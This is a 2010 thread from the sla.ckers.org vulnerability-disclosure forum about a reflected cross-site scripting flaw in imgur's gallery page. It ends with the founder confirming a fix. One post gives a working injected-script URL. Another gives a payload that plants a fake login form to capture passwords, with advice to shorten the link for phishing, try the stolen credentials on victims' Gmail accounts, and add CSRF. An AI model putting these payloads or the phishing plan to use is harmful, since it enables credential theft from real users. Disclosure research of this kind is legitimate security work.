Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in imgur
Posted by: Personoid
Date: June 15, 2010 02:27AM

http://imgur.com/gallery/?v=xss%27%3E%3C/a%3E%3Cscript%3EsetTimeout%28%27alert%28%22xss%22%29%27,%20200%29%3C/script%3E%3Ca%20href=%22?v=xss

Method should be obvious.
I used setTimeout because alert() alone causes the page to stop loading until the viewer has clicked OK (at least in my Firefox).

It's not very useful, but it's there.



Edited 1 time(s). Last edit at 06/15/2010 10:36AM by Personoid.

Options: ReplyQuote
Re: XSS in imgur
Posted by: Skyphire
Date: June 18, 2010 06:10AM

Nice. Folks tend to forget that it's all about stacking attacks. With a bit of social engineering & phishing this might come in handy since they allow registration, you can capture login credentials and try the victims GMail account next to see if they are password re-users. (most likely). Or even better: if they have checked "remember my login credentials" in their browsers, you can just submit a button with CSRF and capture everything.

That's why XSS is never trivial.

Options: ReplyQuote
Re: XSS in imgur
Posted by: Skyphire
Date: June 18, 2010 06:26AM

http://imgur.com/signin

imgur has that handy checkbox: "Stay signed in on this computer"

So it sets a cookie.

Like:

hxxp://imgur.com/gallery/?v=xss'></a><form>
<input tabindex="1" name="username" maxlength="255" id="username" 
class="required" value="" type="text"><input style="margin-bottom: 15px;"
tabindex="2" name="password" maxlength="255" id="password" class="required"
value="" type="password"><input tabindex="4" class="button-big" value="Continue" name="submit" type="button"><script>setInterval("alert(document.forms[0]
['password'].value)",10000);</script>

Wait a bit (10 seconds) and it will echo the password back.

Then put it in a tiny url and start phishing: http://u.nu/8cw3c

Et Voila!



Edited 1 time(s). Last edit at 06/18/2010 06:27AM by Skyphire.

Options: ReplyQuote
Re: XSS in imgur
Posted by: Skyphire
Date: June 19, 2010 10:58AM

moved to omg pwnies, you may delete this post if you want.



Edited 7 time(s). Last edit at 06/19/2010 12:33PM by Skyphire.

Options: ReplyQuote
Re: XSS in imgur
Posted by: Personoid
Date: June 27, 2010 02:32AM

It's probably been quite a while and I've yet to get a response.
It's still not fixed either.
I've been holding off on any use of this other than to post it. I might play around a bit and update with my findings.

Edit: Got preoccupied with other shit and didn't do anything with it.
It's now fixed.


"Thank you so much for reporting this. For some reason this email went into my spam folder, but I just wanted to let you know that it's been fixed.

Thanks again,
Alan Schaaf
Founder, Imgur.com"



Edited 1 time(s). Last edit at 07/12/2010 02:59AM by Personoid.

Options: ReplyQuote


Sorry, only registered users may post in this forum.